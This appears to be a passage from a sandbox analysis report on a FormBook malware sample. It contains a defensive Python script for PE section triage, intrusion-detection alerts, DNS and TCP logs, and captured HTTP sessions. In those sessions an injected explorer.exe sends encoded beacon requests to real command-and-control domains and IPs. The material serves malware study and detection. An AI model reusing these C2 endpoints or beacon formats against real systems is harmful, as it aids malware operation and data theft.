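    ("IMAGE_SCN_MEM_EXECUTE", IMAGE_SCN_MEM_EXECUTE),
    ("IMAGE_SCN_MEM_READ", IMAGE_SCN_MEM_READ),
    ("IMAGE_SCN_MEM_WRITE", IMAGE_SCN_MEM_WRITE),
]

# Assumed heuristic threshold: the sample's .text scores 7.796, while plain
# IL code sections normally sit well below 7.
PACKED_ENTROPY_THRESHOLD = 7.2


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 to 8.0); this is the
    'Entropy (8bit)' figure in the report."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def is_clr_entry_stub(code: bytes, image_base: int, iat_rva: int) -> bool:
    """True if the entry point is 'jmp dword ptr [image_base + iat_rva]'
    (FF 25 followed by a little-endian absolute address), the native stub
    of a 32-bit .NET PE whose only IAT slot is mscoree!_CorExeMain."""
    if len(code) < 6 or code[:2] != b"\xff\x25":
        return False
    return int.from_bytes(code[2:6], "little") == image_base + iat_rva


def section_flags(characteristics: int) -> list:
    """Decode the IMAGE_SCN_* names set in a section's Characteristics field."""
    return [name for name, bit in FLAG_NAMES if characteristics & bit]


def triage_section(name: str, raw: bytes, characteristics: int) -> dict:
    """Entropy plus the two characteristic checks an analyst makes first."""
    flags = section_flags(characteristics)
    entropy = shannon_entropy(raw)
    findings = []
    if "IMAGE_SCN_CNT_CODE" in flags and entropy >= PACKED_ENTROPY_THRESHOLD:
        findings.append("high-entropy code section: packed or encrypted payload likely")
    if characteristics & IMAGE_SCN_MEM_WRITE and characteristics & IMAGE_SCN_MEM_EXECUTE:
        findings.append("writable and executable section")
    return {"name": name, "entropy": round(entropy, 3), "flags": flags, "findings": findings}


# Constructed inputs. ENTRY_STUB is the encoding of the report's first
# instruction, 'jmp dword ptr [00402000h]'; the section bodies are synthetic
# and do not reproduce the sample's bytes.
IMAGE_BASE = 0x400000
IAT_RVA = 0x2000
ENTRY_STUB = b"\xff\x25\x00\x20\x40\x00"
TEXT_CHARACTERISTICS = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
PACKED_TEXT = bytes(range(256)) * 16   # every byte value equally often: entropy 8.0
ZERO_PADDING = bytes(0x200)            # the 00 00 padding after the stub: entropy 0.0

if __name__ == "__main__":
    print("CLR entry stub:", is_clr_entry_stub(ENTRY_STUB, IMAGE_BASE, IAT_RVA))
    print(triage_section(".text", PACKED_TEXT, TEXT_CHARACTERISTICS))
    print(triage_section(".pad", ZERO_PADDING, TEXT_CHARACTERISTICS))
```

On the real file the same checks would be fed the section bytes read from the raw offsets in the section table; the point of the stub check is that a matching entry point tells you to stop looking at native code and go to the CLR metadata (the COM_DESCRIPTOR directory at RVA 0x2008) and the resources instead.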
Timestamp                        Protocol  SID      Signature                              Source Port  Dest Port  Source IP    Dest IP
2024-07-23T18:28:45.882006+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53902        80         192.168.2.7  172.96.187.60
2024-07-23T18:31:48.971715+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53909        80         192.168.2.7  184.154.46.218
2024-07-23T18:32:14.054099+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53910        80         192.168.2.7  103.56.204.76
2024-07-23T18:29:46.592917+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53904        80         192.168.2.7  154.86.16.125
2024-07-23T18:29:06.265172+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53903        80         192.168.2.7  198.185.159.144
2024-07-23T18:32:32.849943+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53911        80         192.168.2.7  23.227.38.74
2024-07-23T18:30:06.593953+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53905        80         192.168.2.7  23.227.38.74
2024-07-23T18:31:28.381840+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53908        80         192.168.2.7  172.67.214.13
2024-07-23T18:30:47.257969+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53907        80         192.168.2.7  1.32.249.49
2024-07-23T18:30:26.792714+0200  TCP       2031412  ET MALWARE FormBook CnC Checkin (GET)  53906        80         192.168.2.7  35.204.150.5
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jul 23, 2024 18:28:45.393340111 CEST  53902        80         192.168.2.7      172.96.187.60
Jul 23, 2024 18:28:45.398197889 CEST  80           53902      172.96.187.60    192.168.2.7
Jul 23, 2024 18:28:45.398303986 CEST  53902        80         192.168.2.7      172.96.187.60
Jul 23, 2024 18:28:45.398363113 CEST  53902        80         192.168.2.7      172.96.187.60
Jul 23, 2024 18:28:45.403131008 CEST  80           53902      172.96.187.60    192.168.2.7
Jul 23, 2024 18:28:45.880321980 CEST  80           53902      172.96.187.60    192.168.2.7
Jul 23, 2024 18:28:45.881122112 CEST  80           53902      172.96.187.60    192.168.2.7
Jul 23, 2024 18:28:45.881302118 CEST  53902        80         192.168.2.7      172.96.187.60
Jul 23, 2024 18:28:45.881373882 CEST  53902        80         192.168.2.7      172.96.187.60
Jul 23, 2024 18:28:45.881867886 CEST  80           53902      172.96.187.60    192.168.2.7
Jul 23, 2024 18:28:45.882005930 CEST  53902        80         192.168.2.7      172.96.187.60
Jul 23, 2024 18:28:45.886152029 CEST  80           53902      172.96.187.60    192.168.2.7
Jul 23, 2024 18:29:05.733191013 CEST  53903        80         192.168.2.7      198.185.159.144
Jul 23, 2024 18:29:05.750376940 CEST  80           53903      198.185.159.144  192.168.2.7
Jul 23, 2024 18:29:05.751193047 CEST  53903        80         192.168.2.7      198.185.159.144
Jul 23, 2024 18:29:05.751194000 CEST  53903        80         192.168.2.7      198.185.159.144
Jul 23, 2024 18:29:05.766720057 CEST  80           53903      198.185.159.144  192.168.2.7
Jul 23, 2024 18:29:06.251101017 CEST  53903        80         192.168.2.7      198.185.159.144
Jul 23, 2024 18:29:06.264987946 CEST  80           53903      198.185.159.144  192.168.2.7
Jul 23, 2024 18:29:06.265172005 CEST  53903        80         192.168.2.7      198.185.159.144
Jul 23, 2024 18:29:45.970545053 CEST  53904        80         192.168.2.7      154.86.16.125
Jul 23, 2024 18:29:45.976159096 CEST  80           53904      154.86.16.125    192.168.2.7
Jul 23, 2024 18:29:45.976228952 CEST  53904        80         192.168.2.7      154.86.16.125
Jul 23, 2024 18:29:45.976314068 CEST  53904        80         192.168.2.7      154.86.16.125
Jul 23, 2024 18:29:45.981715918 CEST  80           53904      154.86.16.125    192.168.2.7
Jul 23, 2024 18:29:46.488523960 CEST  53904        80         192.168.2.7      154.86.16.125
Jul 23, 2024 18:29:46.537535906 CEST  80           53904      154.86.16.125    192.168.2.7
Jul 23, 2024 18:29:46.592556000 CEST  80           53904      154.86.16.125    192.168.2.7
Jul 23, 2024 18:29:46.592916965 CEST  53904        80         192.168.2.7      154.86.16.125
Jul 23, 2024 18:30:06.061840057 CEST  53905        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:30:06.066808939 CEST  80           53905      23.227.38.74     192.168.2.7
Jul 23, 2024 18:30:06.067115068 CEST  53905        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:30:06.067115068 CEST  53905        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:30:06.072477102 CEST  80           53905      23.227.38.74     192.168.2.7
Jul 23, 2024 18:30:06.581896067 CEST  53905        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:30:06.588037014 CEST  80           53905      23.227.38.74     192.168.2.7
Jul 23, 2024 18:30:06.593952894 CEST  53905        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:30:26.268759966 CEST  53906        80         192.168.2.7      35.204.150.5
Jul 23, 2024 18:30:26.273720980 CEST  80           53906      35.204.150.5     192.168.2.7
Jul 23, 2024 18:30:26.273798943 CEST  53906        80         192.168.2.7      35.204.150.5
Jul 23, 2024 18:30:26.273886919 CEST  53906        80         192.168.2.7      35.204.150.5
Jul 23, 2024 18:30:26.278755903 CEST  80           53906      35.204.150.5     192.168.2.7
Jul 23, 2024 18:30:26.785917044 CEST  53906        80         192.168.2.7      35.204.150.5
Jul 23, 2024 18:30:26.791812897 CEST  80           53906      35.204.150.5     192.168.2.7
Jul 23, 2024 18:30:26.792714119 CEST  53906        80         192.168.2.7      35.204.150.5
Jul 23, 2024 18:30:46.659884930 CEST  53907        80         192.168.2.7      1.32.249.49
Jul 23, 2024 18:30:46.665326118 CEST  80           53907      1.32.249.49      192.168.2.7
Jul 23, 2024 18:30:46.665523052 CEST  53907        80         192.168.2.7      1.32.249.49
Jul 23, 2024 18:30:46.665523052 CEST  53907        80         192.168.2.7      1.32.249.49
Jul 23, 2024 18:30:46.670418978 CEST  80           53907      1.32.249.49      192.168.2.7
Jul 23, 2024 18:30:47.157960892 CEST  53907        80         192.168.2.7      1.32.249.49
Jul 23, 2024 18:30:47.209610939 CEST  80           53907      1.32.249.49      192.168.2.7
Jul 23, 2024 18:30:47.251888037 CEST  80           53907      1.32.249.49      192.168.2.7
Jul 23, 2024 18:30:47.257968903 CEST  53907        80         192.168.2.7      1.32.249.49
Jul 23, 2024 18:32:32.318103075 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.323065042 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.323151112 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.323191881 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.328038931 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.829431057 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.849812984 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.849942923 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.850794077 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.850830078 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.850913048 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.853863955 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.853897095 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.853935003 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.854017019 CEST  53911        80         192.168.2.7      23.227.38.74
Jul 23, 2024 18:32:32.856157064 CEST  80           53911      23.227.38.74     192.168.2.7
Jul 23, 2024 18:32:32.856215954 CEST  53911        80         192.168.2.7      23.227.38.74
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Jul 23, 2024 18:28:25.759831905 CEST  53           54140      1.1.1.1      192.168.2.7
Jul 23, 2024 18:28:27.398617029 CEST  53           53357      1.1.1.1      192.168.2.7
Jul 23, 2024 18:28:45.001557112 CEST  57011        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:28:45.392530918 CEST  53           57011      1.1.1.1      192.168.2.7
Jul 23, 2024 18:29:05.626183033 CEST  63983        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:29:05.728339911 CEST  53           63983      1.1.1.1      192.168.2.7
Jul 23, 2024 18:29:25.079246044 CEST  60090        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:29:25.099503994 CEST  53           60090      1.1.1.1      192.168.2.7
Jul 23, 2024 18:29:45.360580921 CEST  56090        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:29:45.969567060 CEST  53           56090      1.1.1.1      192.168.2.7
Jul 23, 2024 18:30:05.798382044 CEST  61418        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:30:06.060776949 CEST  53           61418      1.1.1.1      192.168.2.7
Jul 23, 2024 18:30:26.192321062 CEST  57984        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:30:26.267883062 CEST  53           57984      1.1.1.1      192.168.2.7
Jul 23, 2024 18:30:46.642213106 CEST  49311        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:30:46.657553911 CEST  53           49311      1.1.1.1      192.168.2.7
Jul 23, 2024 18:31:07.193861961 CEST  60337        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:31:07.210998058 CEST  53           60337      1.1.1.1      192.168.2.7
Jul 23, 2024 18:31:27.846740961 CEST  51150        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:31:27.868928909 CEST  53           51150      1.1.1.1      192.168.2.7
Jul 23, 2024 18:31:48.270977974 CEST  60660        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:31:48.374449968 CEST  53           60660      1.1.1.1      192.168.2.7
Jul 23, 2024 18:32:13.199825048 CEST  61256        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:32:13.397809029 CEST  53           61256      1.1.1.1      192.168.2.7
Jul 23, 2024 18:32:32.048837900 CEST  62241        53         192.168.2.7  1.1.1.1
Jul 23, 2024 18:32:32.317480087 CEST  53           62241      1.1.1.1      192.168.2.7
                                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                         Jul 23, 2024 18:28:45.001557112 CEST | 192.168.2.7 | 1.1.1.1 | 0xe196 | Standard query (0) | www.resmierabaru20.shop | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:05.626183033 CEST | 192.168.2.7 | 1.1.1.1 | 0x1a9a | Standard query (0) | www.thepeacedealers.com | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:25.079246044 CEST | 192.168.2.7 | 1.1.1.1 | 0xacc0 | Standard query (0) | www.casinomaxnodepositbonus.icu | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.360580921 CEST | 192.168.2.7 | 1.1.1.1 | 0xe386 | Standard query (0) | www.33pgaaa.com | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:05.798382044 CEST | 192.168.2.7 | 1.1.1.1 | 0xa18f | Standard query (0) | www.ellipsive.com | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:26.192321062 CEST | 192.168.2.7 | 1.1.1.1 | 0x35b6 | Standard query (0) | www.mayson-wedding.com | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:46.642213106 CEST | 192.168.2.7 | 1.1.1.1 | 0x8918 | Standard query (0) | www.gmgex1.com | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:07.193861961 CEST | 192.168.2.7 | 1.1.1.1 | 0x6737 | Standard query (0) | www.passrmale.com | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:27.846740961 CEST | 192.168.2.7 | 1.1.1.1 | 0x58f5 | Standard query (0) | www.trezorsuite.net | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:48.270977974 CEST | 192.168.2.7 | 1.1.1.1 | 0x72ed | Standard query (0) | www.gomenasorry.com | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:32:13.199825048 CEST | 192.168.2.7 | 1.1.1.1 | 0x24b9 | Standard query (0) | www.briefout.cloud | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:32:32.048837900 CEST | 192.168.2.7 | 1.1.1.1 | 0xcd49 | Standard query (0) | www.kaidifeiniroo.net | A (IP address) | IN (0x0001) | false
                                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                         Jul 23, 2024 18:28:45.392530918 CEST | 1.1.1.1 | 192.168.2.7 | 0xe196 | No error (0) | www.resmierabaru20.shop | resmierabaru20.shop | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:28:45.392530918 CEST | 1.1.1.1 | 192.168.2.7 | 0xe196 | No error (0) | resmierabaru20.shop | | 172.96.187.60 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:05.728339911 CEST | 1.1.1.1 | 192.168.2.7 | 0x1a9a | No error (0) | www.thepeacedealers.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:05.728339911 CEST | 1.1.1.1 | 192.168.2.7 | 0x1a9a | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:05.728339911 CEST | 1.1.1.1 | 192.168.2.7 | 0x1a9a | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:05.728339911 CEST | 1.1.1.1 | 192.168.2.7 | 0x1a9a | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:05.728339911 CEST | 1.1.1.1 | 192.168.2.7 | 0x1a9a | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:25.099503994 CEST | 1.1.1.1 | 192.168.2.7 | 0xacc0 | Name error (3) | www.casinomaxnodepositbonus.icu | none | none | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.969567060 CEST | 1.1.1.1 | 192.168.2.7 | 0xe386 | No error (0) | www.33pgaaa.com | www.33pgaaa.com.dns.jiashuba.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.969567060 CEST | 1.1.1.1 | 192.168.2.7 | 0xe386 | No error (0) | www.33pgaaa.com.dns.jiashuba.com | www.33pgaaa.com.sspeeddns.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.969567060 CEST | 1.1.1.1 | 192.168.2.7 | 0xe386 | No error (0) | www.33pgaaa.com.sspeeddns.com | ss-k2-ss-k2.sspeeddns.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.969567060 CEST | 1.1.1.1 | 192.168.2.7 | 0xe386 | No error (0) | ss-k2-ss-k2.sspeeddns.com | | 154.86.16.125 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.969567060 CEST | 1.1.1.1 | 192.168.2.7 | 0xe386 | No error (0) | ss-k2-ss-k2.sspeeddns.com | | 23.224.212.27 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.969567060 CEST | 1.1.1.1 | 192.168.2.7 | 0xe386 | No error (0) | ss-k2-ss-k2.sspeeddns.com | | 61.4.127.87 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:29:45.969567060 CEST | 1.1.1.1 | 192.168.2.7 | 0xe386 | No error (0) | ss-k2-ss-k2.sspeeddns.com | | 143.92.52.237 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:06.060776949 CEST | 1.1.1.1 | 192.168.2.7 | 0xa18f | No error (0) | www.ellipsive.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:06.060776949 CEST | 1.1.1.1 | 192.168.2.7 | 0xa18f | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:26.267883062 CEST | 1.1.1.1 | 192.168.2.7 | 0x35b6 | No error (0) | www.mayson-wedding.com | website-rendering.webador.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:26.267883062 CEST | 1.1.1.1 | 192.168.2.7 | 0x35b6 | No error (0) | website-rendering.webador.com | website-rendering.jouwweb.nl | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:26.267883062 CEST | 1.1.1.1 | 192.168.2.7 | 0x35b6 | No error (0) | website-rendering.jouwweb.nl | | 35.204.150.5 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:30:46.657553911 CEST | 1.1.1.1 | 192.168.2.7 | 0x8918 | No error (0) | www.gmgex1.com | | 1.32.249.49 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:07.210998058 CEST | 1.1.1.1 | 192.168.2.7 | 0x6737 | Name error (3) | www.passrmale.com | none | none | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:27.868928909 CEST | 1.1.1.1 | 192.168.2.7 | 0x58f5 | No error (0) | www.trezorsuite.net | | 172.67.214.13 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:27.868928909 CEST | 1.1.1.1 | 192.168.2.7 | 0x58f5 | No error (0) | www.trezorsuite.net | | 104.21.86.19 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:48.374449968 CEST | 1.1.1.1 | 192.168.2.7 | 0x72ed | No error (0) | www.gomenasorry.com | gomenasorry.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:31:48.374449968 CEST | 1.1.1.1 | 192.168.2.7 | 0x72ed | No error (0) | gomenasorry.com | | 184.154.46.218 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:32:13.397809029 CEST | 1.1.1.1 | 192.168.2.7 | 0x24b9 | No error (0) | www.briefout.cloud | briefout.cloud | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:32:13.397809029 CEST | 1.1.1.1 | 192.168.2.7 | 0x24b9 | No error (0) | briefout.cloud | | 103.56.204.76 | A (IP address) | IN (0x0001) | false
                                                         Jul 23, 2024 18:32:32.317480087 CEST | 1.1.1.1 | 192.168.2.7 | 0xcd49 | No error (0) | www.kaidifeiniroo.net | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                         Jul 23, 2024 18:32:32.317480087 CEST | 1.1.1.1 | 192.168.2.7 | 0xcd49 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         0 | 192.168.2.7 | 53902 | 172.96.187.60 | 80 | 4056 | C:\Windows\explorer.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Jul 23, 2024 18:28:45.398363113 CEST | 186 | OUT | GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=3z9oRqqmd6FbtNg9CkHjvIkeoG86+7PKpZbS0bbY4gI7z8JQO6bI5gwIdi8ZdM48HBzoDxHL8Q== HTTP/1.1
                                                        Host: www.resmierabaru20.shop
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                         Jul 23, 2024 18:28:45.880321980 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                        Date: Tue, 23 Jul 2024 16:28:45 GMT
                                                        Content-Length: 1467
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                        Cache-Control: no-store, max-age=0
                                                        Server: imunify360-webshield/1.21
                                                        Data Raw: 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 [TRUNCATED]
                                                        Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!
                                                         Jul 23, 2024 18:28:45.881122112 CEST | 487 | IN | Data Raw: 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72
                                                        Data Ascii: ![]+!![]+!![]+!![]+[])+(+![])+(+![]+[])+(+!+[]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attac


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         1 | 192.168.2.7 | 53903 | 198.185.159.144 | 80 | 4056 | C:\Windows\explorer.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Jul 23, 2024 18:29:05.751194000 CEST | 186 | OUT | GET /ps15/?XtutFHLx=+OvncPmxK4E3ovTf4IdVLliDjSzyCopJXOwX4tpaGEeHBcqDgavndBw1dSHqFFxWSSZSfTMm+g==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.thepeacedealers.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         2 | 192.168.2.7 | 53904 | 154.86.16.125 | 80 | 4056 | C:\Windows\explorer.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Jul 23, 2024 18:29:45.976314068 CEST | 178 | OUT | GET /ps15/?XtutFHLx=aPdMTWONMgqLFXL6I6D84LbJUFKzfvQKs5jv7ieivWkC5Cuuwn9riAtDpT7vHb1zFty4mtmWJQ==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.33pgaaa.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         3 | 192.168.2.7 | 53905 | 23.227.38.74 | 80 | 4056 | C:\Windows\explorer.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Jul 23, 2024 18:30:06.067115068 CEST | 180 | OUT | GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=Kye4QYwCGZ93CUuJ7G3wCxFSkbsRF7hlwXf/oBbqQT4B5phfVvGGkKkS6yRwXurkmoW1rD9KnQ== HTTP/1.1
                                                        Host: www.ellipsive.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         4 | 192.168.2.7 | 53906 | 35.204.150.5 | 80 | 4056 | C:\Windows\explorer.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Jul 23, 2024 18:30:26.273886919 CEST | 185 | OUT | GET /ps15/?XtutFHLx=Jp/OLPjQh1lJnocY9w89QXitnE8TmDemwLH3w+grDpijucgoNCx/lT69JUoPCmCPyF9CRMydNg==&_jATs=UfdXThPpQ4ST0 HTTP/1.1
                                                        Host: www.mayson-wedding.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         5 | 192.168.2.7 | 53907 | 1.32.249.49 | 80 | 4056 | C:\Windows\explorer.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         Jul 23, 2024 18:30:46.665523052 CEST | 177 | OUT | GET /ps15/?_jATs=UfdXThPpQ4ST0&XtutFHLx=EF4JIPGNIcmyDue7LvVl2/edyrLqyOOWiNy0SIrLdOiQ87GLGj4j/HRcN2lkEgVcoy4RKpdq7w== HTTP/1.1
                                                        Host: www.gmgex1.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:


                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                         6 | 192.168.2.7 | 53911 | 23.227.38.74 | 80
                                                         Timestamp | Bytes transferred | Direction | Data
